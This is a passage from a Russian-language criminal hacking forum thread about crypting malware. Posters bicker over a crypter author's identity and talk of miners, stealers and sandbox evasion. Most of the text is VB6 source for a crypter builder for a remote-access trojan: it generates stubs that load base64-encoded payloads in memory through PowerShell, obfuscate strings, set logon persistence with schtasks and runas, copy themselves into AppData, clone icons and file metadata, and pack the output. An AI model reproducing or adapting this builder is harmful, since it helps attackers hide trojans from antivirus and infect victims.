Обсуждение вынесено в отдельный топ. Тут мы организуем общие технические разговоры (флудилку) по крипту, чтобы не засорялись коммерческие топы.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Техническая болталка (задушевные разговоры о малваре, крипте и т.д.)
- Автор темы a1d
- Дата начала
Эмулятор эмулирует отдельную среду со своей архетектурой процессора виртуализотор как бы подражает той среде в которой установлен.
А занаете...вот не стоит ему объяснять, пусть у него сандбоксы эмулируют а виртуализаторы подражают...ну и прочие умные мысли пусть имеют место быть =)
Те пусть он и дальше криптует школяров за 3 копейки, вам что жалко?
Те пусть он и дальше криптует школяров за 3 копейки, вам что жалко?
Зачем ты стираешь сообщения? Оставляй чтоб все могли прочитать. Еще вчера заметила что ты мутный.
Зачем раздувать срач? Я данным гсподам ссылку оставил но потом подумал что закончим на нейтральной ноте.
Вы так пошутили? А вам статистика 159 на 5 ни о чем не говорит?
Хз первый раз вижу подобное, это ты в писочнице запускаешь, если да то попробуй на виртуалке
Это живая система .
*( ни когда в жизни не пользовался песочницей , и если честно видел её только на скринах)
*( виртуалки , даже плешивый стиллер чует виртуалку и не запускается на ней. )
А че свой ник
MR.MORFEY не используешь, он вроде не занят.
Пахнет диким клеем и фейком. Морфея знал раньше, форум держал, не популярный но четкий. И софт его юзал. Включая данный майнер. Чем докажешь что ты это он?
И кстать xmrig не поддерживает больше ограничения потоков. Только приоритеты процесса.
MR.MORFEY не используешь, он вроде не занят.
Пахнет диким клеем и фейком. Морфея знал раньше, форум держал, не популярный но четкий. И софт его юзал. Включая данный майнер. Чем докажешь что ты это он?
И кстать xmrig не поддерживает больше ограничения потоков. Только приоритеты процесса.
Я с самого начала про криптерс.инфо подумал ...
Потому и полез проверять...
Точно, я уже и название форума забыл его, давно морфея не было видно.
Он закрыл форум , и канал на ютубе удалил ( Mr ***** )
Морфей , ты ли это ?
Как твой канал на ютубе назывался ?
Это я, вот мульт https://xss.pro/members/177146/, потерял доступ к нему, клея нет там
Это я, форум закрыл и канал удалил, просто у меня была жёсткая дизмораль и подгорело очень сильно вот и сорвался, решил всё бросить, вот другой канал https://www.youtube.com/channel/UCq1Vizpi9M1epRv-JEiMk1g?view_as=subscriber
А че с доменом форума? так то можно бы было верфнуть тя через домен и вернуть ник твой. Если сможешь в dns указать в txt записях что то относящиеся к теме думаю админ и модеры вернули тебе твой ник а этот удалили. Так то если это реально ты, я очень буду рад тебя тут видеть! Мне есть о чем с тобой поболтать на форуме)
Восстановил акк не помнил на какую из почт он был регнут, сча ns вбил этого форума, можешь чекнуть
Ты рофлишь?, я не знаю что такое полиморфизм в 2020 году:smile75:, всё стало на столько сложно пздц, я тут кое что потестил и разочаравался@MR. MORFEY У меня столько вопросов к тебе по полиморфизму на .Net)) ты бы знал.я прям твой фанат)
А как же твой криптер под ревендж рата? пытался разобрать них-я не понял
А что тут понимать, генерируешь модуль / компилируешь / вызываешь через CLR powershell сервак, но это говно устарело как говно
Мне стыдно но это говнокод ещё тот
C#:
If CheckBox5.Value = xtpChecked Then
Dim eofdata As String
eofdata = ReadEOFData(CD.FileName)
End If
Dim uc8JmbQUc As String
Open FlatEdit1.Text For Binary As #1
uc8JmbQUc = Space(LOF(1))
Get #1, , uc8JmbQUc
Close #1
A1 = sRandom
B2 = sRandom
D4 = sRandom
J9 = sRandom
Text1.Text = sRandom
ProgressBar1.Value = 20
If Combo1.Text Like "*.exe" Or Combo1.Text Like "*.scr" Or Combo1.Text Like "*.com" Or Combo1.Text Like "*.cmd" Then
Open App.Path & "\Module1.bas" For Append As #1
Print #1, "Sub Main()"
Print #1, func_100s(decrypt("powershell -noexit start-sleep 30;IEX([Reflection.Assembly]::Load([Convert]::FromBase64String('" & Base64Encoding(uc8JmbQUc) & "')).'EntryPoint'.'Invoke'($Null,$Null))"))
Print #1, "Shell " & A1 & "(" & Text1.Text & "), vbHide"
If CheckBox1.Value = xtpChecked Then
Print #1, "CreateObject(" & A1 & "(" & Chr(34) & decrypt("Shell.Application") & Chr(34) & ")).ShellExecute " & A1 & "(" & Chr(34) & decrypt("schtasks.exe") & Chr(34) & "), " & A1 & "(" & Chr(34) & decrypt("/create /sc onlogon /tn " & FlatEdit3.Text & " /tr %USERPROFILE%\AppData\" & FlatEdit3.Text & Combo1.Text) & Chr(34) & "), " & Chr(34) & Chr(34) & ", " & A1 & "(" & Chr(34) & decrypt("runas") & Chr(34) & "), 0"
Print #1, "On Error Resume Next"
Print #1, "FileCopy App.Path & " & A1 & "(" & Chr(34) & decrypt("\") & Chr(34) & ") & App.EXEName & " & A1 & "(" & Chr(34) & decrypt(Combo1.Text) & Chr(34) & "), Environ(" & A1 & "(" & Chr(34) & decrypt("USERPROFILE") & Chr(34) & ")) & " & A1 & "(" & Chr(34) & decrypt("\AppData\" & FlatEdit3.Text & Combo1.Text) & Chr(34) & ")"
End If
If CheckBox6.Value = xtpChecked Then
Print #1, "Set " & J9 & " = CreateObject(" & A1 & "(" & Chr$(34) & decrypt("InternetExplorer.Application") & Chr$(34) & "))"
Print #1, J9 & ".Visible = False"
Print #1, J9 & ".Navigate " & A1 & "(" & Chr$(34) & decrypt(FlatEdit2.Text) & Chr$(34) & ")"
End If
Print #1, "End Sub"
Print #1, "Function " & A1 & "(" & B2 & ")"
Print #1, "For " & D4 & " = &H1 To Len(" & B2 & ")"
Print #1, A1 & " = " & A1 & " & Chr$(Asc(Mid$(" & B2 & ", " & D4 & ", &H1)) - " & Text2.Text & ")"
Print #1, "Next"
Print #1, "End Function"
Close #1
Set x = CreateObject("Wscript.Shell")
x.Run App.Path & "\compiler\vb6.exe /make " & App.Path & "\Module1.bas /outdir " & App.Path & "\", 0, True
Set x = Nothing
If CheckBox4.Value = xtpUnchecked Then
Kill App.Path & "\Module1.bas"
End If
If CheckBox2.Value = xtpChecked Then
Call ChangeIcon(App.Path & "\Project1.exe", Form1.FlatEdit4.Text)
End If
If CheckBox3.Value = xtpChecked Then
Call CloneFileInformation(FlatEdit5.Text, App.Path & "\Project1.exe")
End If
If CheckBox5.Value = xtpChecked Then
Call WriteEOFData(CD.FileName, eofdata)
End If
If RadioButton1.Value = "1" Then
Set x = CreateObject("Wscript.Shell")
x.Run App.Path & "\tools\upx.exe " & "-9 " & App.Path & "\Project1.exe", 0, True
Set x = Nothing
End If
If RadioButton2.Value = "1" Then
Set x = CreateObject("Wscript.Shell")
x.Run App.Path & "\tools\mpress.exe " & "-i " & App.Path & "\Project1.exe", 0, True
Set x = Nothing
End If
If RadioButton3.Value = "1" Then
Set x = CreateObject("Wscript.Shell")
x.Run App.Path & "\tools\pec.exe " & App.Path & "\Project1.exe", 0, True
Set x = Nothing
End If
If FlatEdit6.Text <> "0 Bytes" Then
Bytes = Replace(FlatEdit6.Text, " Bytes", "")
For i = 1 To Bytes
Open App.Path & "\Project1.exe" For Append As #1
Print #1, LOF(1), " "
Close #1
Next i
End If
Name App.Path & "\Project1.exe" As App.Path & "\Crypted" & Combo1.Text
End If
If Combo1.Text Like "*.vbs" Then
Open App.Path & "\Module1.vbs" For Append As #1
Print #1, func_100s(decrypt("powershell -noexit start-sleep 30;IEX([Reflection.Assembly]::Load([Convert]::FromBase64String('" & Base64Encoding(uc8JmbQUc) & "')).'EntryPoint'.'Invoke'($Null,$Null))"))
Print #1, "CreateObject(" & A1 & "(" & Chr(34) & decrypt("Wscript.Shell") & Chr$(34) & ")).run " & A1 & "(" & Text1.Text & "), 0"
If CheckBox1.Value = xtpChecked Then
Print #1, "CreateObject(" & A1 & "(" & Chr(34) & decrypt("Shell.Application") & Chr(34) & ")).ShellExecute " & A1 & "(" & Chr(34) & decrypt("schtasks.exe") & Chr(34) & "), " & A1 & "(" & Chr(34) & decrypt("/create /sc onlogon /tn " & FlatEdit3.Text & " /tr %USERPROFILE%\AppData\" & FlatEdit3.Text & Combo1.Text) & Chr(34) & "), " & Chr(34) & Chr(34) & ", " & A1 & "(" & Chr(34) & decrypt("runas") & Chr(34) & "), 0"
Print #1, "CreateObject(" & A1 & "(" & Chr(34) & decrypt("Scripting.FileSystemObject") & Chr(34) & ")).CopyFile WScript.ScriptFullName, CreateObject(" & A1 & "(" & Chr(34) & decrypt("WScript.Shell") & Chr(34) & ")).ExpandEnvironmentStrings(" & A1 & "(" & Chr(34) & decrypt("%USERPROFILE%\AppData\" & FlatEdit3.Text & Combo1.Text) & Chr(34) & "))"
End If
If CheckBox6.Value = xtpChecked Then
Print #1, "Set " & J9 & " = CreateObject(" & A1 & "(" & Chr$(34) & decrypt("InternetExplorer.Application") & Chr$(34) & "))"
Print #1, J9 & ".Visible = False"
Print #1, J9 & ".Navigate " & A1 & "(" & Chr$(34) & decrypt(FlatEdit2.Text) & Chr$(34) & ")"
End If
Print #1, "Function " & A1 & "(" & B2 & ")"
Print #1, "For " & D4 & " = &H1 To Len(" & B2 & ")"
Print #1, A1 & " = " & A1 & " & Chr(Asc(Mid(" & B2 & ", " & D4 & ", &H1)) - " & Text2.Text & ")"
Print #1, "Next"
Print #1, "End Function"
Close #1
End If
If Combo1.Text Like "*.wsf" Then
Open App.Path & "\Module1.wsf" For Append As #1
Print #1, "<Job>"
Print #1, "<script language=vbscript>"
Print #1, func_100s(decrypt("powershell -noexit start-sleep 30;IEX([Reflection.Assembly]::Load([Convert]::FromBase64String('" & Base64Encoding(uc8JmbQUc) & "')).'EntryPoint'.'Invoke'($Null,$Null))"))
Print #1, "CreateObject(" & A1 & "(" & Chr(34) & decrypt("Wscript.Shell") & Chr$(34) & ")).run " & A1 & "(" & Text1.Text & "), 0"
If CheckBox1.Value = xtpChecked Then
Print #1, "CreateObject(" & A1 & "(" & Chr(34) & decrypt("Shell.Application") & Chr(34) & ")).ShellExecute " & A1 & "(" & Chr(34) & decrypt("schtasks.exe") & Chr(34) & "), " & A1 & "(" & Chr(34) & decrypt("/create /sc onlogon /tn " & FlatEdit3.Text & " /tr %USERPROFILE%\AppData\" & FlatEdit3.Text & Combo1.Text) & Chr(34) & "), " & Chr(34) & Chr(34) & ", " & A1 & "(" & Chr(34) & decrypt("runas") & Chr(34) & "), 0"
Print #1, "CreateObject(" & A1 & "(" & Chr(34) & decrypt("Scripting.FileSystemObject") & Chr(34) & ")).CopyFile WScript.ScriptFullName, CreateObject(" & A1 & "(" & Chr(34) & decrypt("WScript.Shell") & Chr(34) & ")).ExpandEnvironmentStrings(" & A1 & "(" & Chr(34) & decrypt("%USERPROFILE%\AppData\" & FlatEdit3.Text & Combo1.Text) & Chr(34) & "))"
End If
If CheckBox6.Value = xtpChecked Then
Print #1, "Set " & J9 & " = CreateObject(" & A1 & "(" & Chr$(34) & decrypt("InternetExplorer.Application") & Chr$(34) & "))"
Print #1, J9 & ".Visible = False"
Print #1, J9 & ".Navigate " & A1 & "(" & Chr$(34) & decrypt(FlatEdit2.Text) & Chr$(34) & ")"
End If
Print #1, "Function " & A1 & "(" & B2 & ")"
Print #1, "For " & D4 & " = &H1 To Len(" & B2 & ")"
Print #1, A1 & " = " & A1 & " & Chr(Asc(Mid(" & B2 & ", " & D4 & ", &H1)) - " & Text2.Text & ")"
Print #1, "Next"
Print #1, "End Function"
Print #1, "</script>"
Print #1, "</Job>"
Close #1
End If
ProgressBar1.Value = 100
MsgBox "Ok", vbInformation
ShellExecute Me.hwnd, vbNullString, "https://crypters.info/", vbNullString, "C:\", 1Сейчас не до морфера, с проактивкой беда пздц
Последнее редактирование: